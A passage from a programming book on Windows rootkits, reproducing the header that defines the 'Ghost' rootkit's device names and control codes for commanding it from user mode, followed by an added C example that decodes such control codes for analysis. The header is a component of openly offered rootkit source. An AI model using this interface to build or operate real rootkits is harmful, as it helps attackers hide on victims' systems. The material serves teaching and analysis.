IoManager.h


The file Controller.h provides the definitions required by both the rootkit and the controller. To let a single file serve more than one purpose, a keyword defined elsewhere, _GHOST_ROOTKIT_, is used. The rootkit must define this keyword, while the controller must not. This allows the rootkit and the controller to share I/O communication definitions without requiring the controller to know anything about the internal structure of the rootkit:

  // Copyright Ric Vieler, 2006
  // Definitions for Ghost IO control
  #ifndef _GHOST_IO_H_
  #define _GHOST_IO_H_

  // Use CreateFile( GHOST_DEVICE_OPEN_NAME, ... ) externally
  // Use GHOST_DEVICE_CREATE_NAME internally to create device
  // Use GHOST_DEVICE_LINK_NAME internally to create device link
  #define GHOST_DEVICE_CREATE_NAME L"\\Device\\MyDeviceDriver"
  #define GHOST_DEVICE_LINK_NAME   L"\\DosDevices\\MyDeviceDriver"
  #define GHOST_DEVICE_OPEN_NAME   "\\\\.\\MyDeviceDriver"

  // Set command = GHOST_ON or GHOST_OFF for GHOST_ON_OFF_COMMAND
  // Get command = GHOST_ON or GHOST_OFF for GHOST_STATUS_COMMAND
  // (single buffered structure passed in both directions by DeviceIoControl)
  typedef struct
  {
    int command;
  } GHOST_IOCTLDATA;

  // definitions from ntddk.h
  // (these won't be defined in user mode apps)
  #ifndef CTL_CODE
  #define CTL_CODE( DeviceType, Function, Method, Access ) (                 \
    ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
  )
  #endif
  #ifndef FILE_DEVICE_UNKNOWN
  #define FILE_DEVICE_UNKNOWN 0x00000022
  #endif
  #ifndef METHOD_BUFFERED
  #define METHOD_BUFFERED 0
  #endif
  #ifndef FILE_ANY_ACCESS
  #define FILE_ANY_ACCESS 0
  #endif

  // Use these to command the rootkit!
  #define GHOST_ON_OFF_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
  #define GHOST_STATUS_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
  #define GHOST_OFF 0
  #define GHOST_ON  1

  // Internal functions (kernel side only; hidden from the controller)
  #ifdef _GHOST_ROOTKIT_
  NTSTATUS OnDeviceControl( PFILE_OBJECT FileObject, BOOLEAN Wait,
                            PVOID InputBuffer, ULONG InputBufferLength,
                            PVOID OutputBuffer, ULONG OutputBufferLength,
                            ULONG IoControlCode, PIO_STATUS_BLOCK IoStatus,
                            PDEVICE_OBJECT DeviceObject );
  NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp );
  #endif

  #endif
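The two control codes above are just bit fields packed by CTL_CODE, so an analyst looking at a user-mode process calling DeviceIoControl on an unknown device can unpack the code and recognise the shape of a custom driver interface. The following is an added example, not code from the book: it reproduces the header's macros and adds a hypothetical decode_ioctl/is_vendor_ioctl pair that splits a code back into device type, access, function and transfer method.

```c
#include <stdint.h>
#include <stdio.h>

/* Same formula and constants as the Ghost header (and ntddk.h). */
#define CTL_CODE(DeviceType, Function, Method, Access) \
    (((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method))
#define FILE_DEVICE_UNKNOWN 0x00000022
#define METHOD_BUFFERED     0
#define FILE_ANY_ACCESS     0
#define GHOST_ON_OFF_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define GHOST_STATUS_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)

struct ioctl_fields {
    uint32_t device_type;  /* bits 31..16 */
    uint32_t access;       /* bits 15..14 */
    uint32_t function;     /* bits 13..2  */
    uint32_t method;       /* bits 1..0   */
};

/* Hypothetical helper: split a 32-bit I/O control code into its CTL_CODE fields. */
struct ioctl_fields decode_ioctl(uint32_t code) {
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      = code & 0x3;
    return f;
}

/* Function numbers 0x800 and above are reserved for third-party drivers; paired
   with FILE_DEVICE_UNKNOWN this is the typical shape of a private driver interface
   like the one the header defines. */
int is_vendor_ioctl(uint32_t code) {
    struct ioctl_fields f = decode_ioctl(code);
    return f.device_type == FILE_DEVICE_UNKNOWN && f.function >= 0x800;
}

int main(void) {
    uint32_t codes[] = { GHOST_ON_OFF_COMMAND, GHOST_STATUS_COMMAND };
    for (int i = 0; i < 2; i++) {
        struct ioctl_fields f = decode_ioctl(codes[i]);
        printf("0x%06X: device=0x%X function=0x%X method=%u access=%u vendor=%d\n",
               codes[i], f.device_type, f.function, f.method, f.access,
               is_vendor_ioctl(codes[i]));
    }
    return 0;
}
```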




Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
Year: 2007
Pages: 229
Authors: Ric Vieler
